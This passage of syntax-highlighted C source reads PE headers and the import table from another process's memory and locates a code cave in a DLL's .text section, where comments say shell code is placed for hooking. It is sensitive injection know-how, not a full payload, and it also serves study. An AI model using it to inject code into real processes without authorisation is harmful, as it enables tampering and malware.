<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"Invalid DOS header. e_magic is not 0x5a4d</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">pImage</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">malloc</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="n">LOADED_IMAGE</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">pImage</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"malloc() failed in ReadRemoteImage()</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">pImage</span><span class="o">-></span><span class="n">FileHeader</span><span class="w"> </span><span class="o">=</span><span class="w"> </span>
<span class="w"> </span><span class="p">(</span><span class="n">PIMAGE_NT_HEADERS32</span><span class="p">)(</span><span class="n">lpBuffer</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">pDOSHeader</span><span class="o">-></span><span class="n">e_lfanew</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">pImage</span><span class="o">-></span><span class="n">NumberOfSections</span><span class="w"> </span><span class="o">=</span><span class="w"> </span>
<span class="w"> </span><span class="n">pImage</span><span class="o">-></span><span class="n">FileHeader</span><span class="o">-></span><span class="n">FileHeader</span><span class="p">.</span><span class="n">NumberOfSections</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">pImage</span><span class="o">-></span><span class="n">Sections</span><span class="w"> </span><span class="o">=</span><span class="w"> </span>
<span class="w"> </span><span class="p">(</span><span class="n">PIMAGE_SECTION_HEADER</span><span class="p">)(</span><span class="n">lpBuffer</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">pDOSHeader</span><span class="o">-></span><span class="n">e_lfanew</span><span class="w"> </span><span class="o">+</span><span class="w"> </span>
<span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">IMAGE_NT_HEADERS32</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">pImage</span><span class="o">-></span><span class="n">FileHeader</span><span class="o">-></span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">Magic</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mh">0x10b</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="c1">// PE32</span>
<span class="w"> </span><span class="n">pImage</span><span class="o">-></span><span class="n">FileHeader</span><span class="o">-></span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">Magic</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mh">0x20b</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="c1">// PE32+</span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"Invalid Magic in OptionalHeader</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
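<span class="w"> </span><span class="n">free</span><span class="p">(</span><span class="n">pImage</span><span class="p">);</span><span class="w"> </span><span class="c1">// release the structure allocated above</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>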
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"[i] Detected %s architecture</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">pImage</span><span class="o">-></span><span class="n">FileHeader</span><span class="o">-></span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">Magic</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mh">0x10b</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="s">"PE32"</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="s">"PE32+"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">pImage</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="c1">// =============================================================================================</span>
<span class="n">PIMAGE_SECTION_HEADER</span><span class="w"> </span><span class="nf">FindSectionHeaderByName</span><span class="p">(</span><span class="n">PIMAGE_SECTION_HEADER</span><span class="w"> </span><span class="n">pHeaders</span><span class="p">,</span><span class="w"> </span>
<span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">dwNumberOfSections</span><span class="p">,</span><span class="w"> </span><span class="n">LPCSTR</span><span class="w"> </span><span class="n">pSectionName</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">PIMAGE_SECTION_HEADER</span><span class="w"> </span><span class="n">pHeaderMatch</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="p">(</span><span class="n">DWORD</span><span class="w"> </span><span class="n">i</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="n">dwNumberOfSections</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="o">++</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">PIMAGE_SECTION_HEADER</span><span class="w"> </span><span class="n">pHeader</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">&</span><span class="n">pHeaders</span><span class="p">[</span><span class="n">i</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">_strnicmp</span><span class="p">((</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">pHeader</span><span class="o">-></span><span class="n">Name</span><span class="p">,</span><span class="w"> </span><span class="n">pSectionName</span><span class="p">,</span><span class="w"> </span><span class="n">IMAGE_SIZEOF_SHORT_NAME</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">pHeaderMatch</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">pHeader</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">break</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">pHeaderMatch</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="cm">/*</span>
<span class="cm"> * Finds a code cave in the .text section of the DLL. If this function is unable to </span>
<span class="cm"> * find a code cave at least minimalCodeCaveSize bytes long, it fails and so will the whole </span>
<span class="cm"> * hooking attempt. On failure, it returns 0.</span>
<span class="cm"> */</span><span class="w"></span>
<span class="n">DWORD</span><span class="w"></span>
<span class="nf">FindRemoteCodeCave</span><span class="p">(</span><span class="n">HANDLE</span><span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"> </span><span class="n">LPVOID</span><span class="w"> </span><span class="n">lpImageBaseAddress</span><span class="p">,</span><span class="w"> </span><span class="n">LPCTSTR</span><span class="w"> </span><span class="n">libName</span><span class="p">,</span><span class="w"> </span><span class="n">SIZE_T</span><span class="w"> </span><span class="n">minimalCodeCaveSize</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">dwHandlerAddress</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">PLOADED_IMAGE</span><span class="w"> </span><span class="n">pLoadedImage</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">PIMAGE_SECTION_HEADER</span><span class="w"> </span><span class="n">pCodeSectionHeader</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">pLoadedImage</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ReadRemoteImage</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">lpImageBaseAddress</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">pLoadedImage</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"ReadRemoteImage failed...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">pCodeSectionHeader</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">FindSectionHeaderByName</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">pLoadedImage</span><span class="o">-></span><span class="n">Sections</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">pLoadedImage</span><span class="o">-></span><span class="n">NumberOfSections</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="s">".text"</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">pCodeSectionHeader</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"Couldn't locate the .text section. Maybe it's named differently</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="cm">/*</span>
<span class="cm"> * PE files are laid out differently in memory than on disk: the raw data of a section</span>
<span class="cm"> * is padded to the file alignment, so the tail of .text usually holds unused padding</span>
<span class="cm"> * bytes. We place our shell code in the last minimalCodeCaveSize bytes of that tail:</span>
<span class="cm"> */</span><span class="w"></span>
<span class="w"> </span><span class="n">dwHandlerAddress</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">DWORD</span><span class="p">)</span><span class="n">lpImageBaseAddress</span><span class="w"> </span><span class="o">+</span><span class="w"> </span>
<span class="w"> </span><span class="n">pCodeSectionHeader</span><span class="o">-></span><span class="n">VirtualAddress</span><span class="w"> </span><span class="o">+</span><span class="w"> </span>
<span class="w"> </span><span class="n">pCodeSectionHeader</span><span class="o">-></span><span class="n">SizeOfRawData</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">minimalCodeCaveSize</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">dwHandlerAddress</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="c1">// =============================================================================================</span>
<span class="n">BOOL</span><span class="w"></span>
<span class="nf">PrintImportDirectory</span><span class="p">(</span><span class="n">HANDLE</span><span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"> </span><span class="n">PIMAGE_DATA_DIRECTORY</span><span class="w"> </span><span class="n">imageImportDirectory</span><span class="p">,</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">imageBase</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">PCHAR</span><span class="w"> </span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">dllNameBuf</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">PCHAR</span><span class="w"> </span><span class="n">lpFunctionNameBuf</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">PIMAGE_IMPORT_DESCRIPTOR</span><span class="w"> </span><span class="n">pImageImportDescriptor</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">IMAGE_THUNK_DATA</span><span class="w"> </span><span class="n">ThunkDataINT</span><span class="p">,</span><span class="w"> </span><span class="n">ThunkDataIAT</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">PIMAGE_IMPORT_BY_NAME</span><span class="w"> </span><span class="n">pImageImportByName</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">functionOffset</span><span class="p">,</span><span class="w"> </span><span class="n">firstRVA</span><span class="p">,</span><span class="w"> </span><span class="n">counter</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">firstRVA</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">BOOL</span><span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">RetReadProcessMemory</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">buf</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">PVOID</span><span class="p">)(</span><span class="n">imageBase</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">imageImportDirectory</span><span class="o">-></span><span class="n">VirtualAddress</span><span class="p">),</span><span class="w"></span>
<span class="w"> </span><span class="mi">50</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">IMAGE_IMPORT_DESCRIPTOR</span><span class="p">)</span><span class="w"> </span><span class="c1">// not more than 50 dll's in a module :)</span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"RetReadProcessMemory(buf) in PrintImportDirectory() failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">bSuccess</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="n">MEM_ALLOC_FAIL_CODE</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="n">free</span><span class="p">(</span><span class="n">buf</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">pImageImportDescriptor</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">PIMAGE_IMPORT_DESCRIPTOR</span><span class="p">)</span><span class="n">buf</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* pImageImportDescriptor[index].Characteristics is </span>
<span class="cm"> * set to 0 to indicate the end of the array of IMAGE_IMPORT_DESCRIPTORs.</span>
<span class="cm"> */</span><span class="w"></span>
<span class="w"> </span><span class="k">while</span><span class="w"> </span><span class="p">(</span><span class="n">pImageImportDescriptor</span><span class="o">-></span><span class="n">Characteristics</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Read the memory of the DLLName:) */</span><span class="w"></span>
<span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">RetReadProcessMemory</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">dllNameBuf</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">PVOID</span><span class="p">)(</span><span class="n">imageBase</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">pImageImportDescriptor</span><span class="o">-></span><span class="n">Name</span><span class="p">),</span><span class="w"></span>
<span class="w"> </span><span class="n">BUFFER_SIZE_SMALL</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"RetReadProcessMemory(dllNameBuf) in PrintImportDirectory() failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">bSuccess</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="n">MEM_ALLOC_FAIL_CODE</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="n">free</span><span class="p">(</span><span class="n">dllNameBuf</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">Dll </span><span class="se">\"</span><span class="s">%s</span><span class="se">\"</span><span class="s"> found"</span><span class="p">,</span><span class="w"> </span><span class="p">(</span><span class="n">PCHAR</span><span class="p">)</span><span class="n">dllNameBuf</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n\t</span><span class="s">OriginalFirstThunk is 0x%x"</span><span class="p">,</span><span class="w"> </span><span class="n">pImageImportDescriptor</span><span class="o">-></span><span class="n">OriginalFirstThunk</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n\t</span><span class="s">FirstThunk is 0x%x"</span><span class="p">,</span><span class="w"> </span><span class="n">pImageImportDescriptor</span><span class="o">-></span><span class="n">FirstThunk</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n\t</span><span class="s">TimeDateStamp is 0x%x"</span><span class="p">,</span><span class="w"> </span><span class="n">pImageImportDescriptor</span><span class="o">-></span><span class="n">TimeDateStamp</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n\t</span><span class="s">ForwarderChain is 0x%x"</span><span class="p">,</span><span class="w"> </span><span class="n">pImageImportDescriptor</span><span class="o">-></span><span class="n">ForwarderChain</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">free</span><span class="p">(</span><span class="n">dllNameBuf</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n\n\t</span><span class="s">FUNCTION-NAME : FUNCTION-ADDRESS : ADDRESS OF FUNCTION ADDRESS"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">functionOffset</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">imageBase</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">pImageImportDescriptor</span><span class="o">-></span><span class="n">FirstThunk</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">counter</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">while</span><span class="w"> </span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Read the memory of the INT thunk table element :) */</span><span class="w"></span>
<span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ReadProcessMemory</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">PVOID</span><span class="p">)(</span><span class="n">imageBase</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">pImageImportDescriptor</span><span class="o">-></span><span class="n">OriginalFirstThunk</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">counter</span><span class="o">*</span><span class="k">sizeof</span><span class="p">(</span><span class="n">PVOID</span><span class="p">)),</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">ThunkDataINT</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">IMAGE_THUNK_DATA</span><span class="p">),</span><span class="w"></span>
<span class="w"> </span><span class="nb">NULL</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"ReadProcessMemory(ThunkDataINT) in PrintImportDirectory() failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Read the memory of the IAT thunk table element :) */</span><span class="w"></span>
<span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ReadProcessMemory</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">PVOID</span><span class="p">)(</span><span class="n">imageBase</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">pImageImportDescriptor</span><span class="o">-></span><span class="n">FirstThunk</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">counter</span><span class="o">*</span><span class="k">sizeof</span><span class="p">(</span><span class="n">PVOID</span><span class="p">)),</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">ThunkDataIAT</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">IMAGE_THUNK_DATA</span><span class="p">),</span><span class="w"></span>
<span class="w"> </span><span class="nb">NULL</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"ReadProcessMemory(ThunkDataIAT) in PrintImportDirectory() failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Check if we reached the end of the array */</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">ThunkDataINT</span><span class="p">.</span><span class="n">u1</span><span class="p">.</span><span class="n">AddressOfData</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="n">ThunkDataIAT</span><span class="p">.</span><span class="n">u1</span><span class="p">.</span><span class="n">Function</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="k">break</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">counter</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="n">firstRVA</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ThunkDataINT</span><span class="p">.</span><span class="n">u1</span><span class="p">.</span><span class="n">AddressOfData</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* </span>
<span class="cm"> * A big problem here is that the RVAs pointing to the function names in the INT</span>
<span class="cm"> * are not in ascending order. The RVAs may even be broken (yeah, the linkers are bad^^)</span>
<span class="cm"> * and we may get invalid indices. How can we figure out whether we have a valid RVA in </span>
<span class="cm"> * ThunkDataINT.u1.AddressOfData?!</span>
<span class="cm"> * There are only bad solutions (or laziness when it comes to heuristic fine tuning),</span>
<span class="cm"> * so we apply a heuristic to all RVAs of the IMAGE_THUNK_DATA INT array and ignore</span>
<span class="cm"> * those that differ from the first RVA by more than 0x5000 bytes. What happens if the</span>
<span class="cm"> * first RVA is an invalid one? We're screwed, but at least the problem can be located</span>
<span class="cm"> * quickly.</span>
<span class="cm"> */</span><span class="w"></span>
<span class="w"> </span><span class="c1">// test if we stumbled upon a suspicious RVA (after hoping that the first is not :/)</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">abs</span><span class="p">(</span><span class="n">ThunkDataINT</span><span class="p">.</span><span class="n">u1</span><span class="p">.</span><span class="n">AddressOfData</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">firstRVA</span><span class="p">)</span><span class="w"> </span><span class="o">></span><span class="w"> </span><span class="mh">0x5000</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"</span><span class="se">\n</span><span class="s">RVA in INT->u1.AddressOfData might be broken (%x) - ignoring</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">ThunkDataINT</span><span class="p">.</span><span class="n">u1</span><span class="p">.</span><span class="n">AddressOfData</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">RetReadProcessMemory</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">lpFunctionNameBuf</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">PVOID</span><span class="p">)(</span><span class="n">imageBase</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">ThunkDataINT</span><span class="p">.</span><span class="n">u1</span><span class="p">.</span><span class="n">AddressOfData</span><span class="p">),</span><span class="w"></span>
<span class="w"> </span><span class="n">BUFFER_SIZE_SMALL</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"RetReadProcessMemory(lpFunctionNameBuf) in PrintImportDirectory() failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
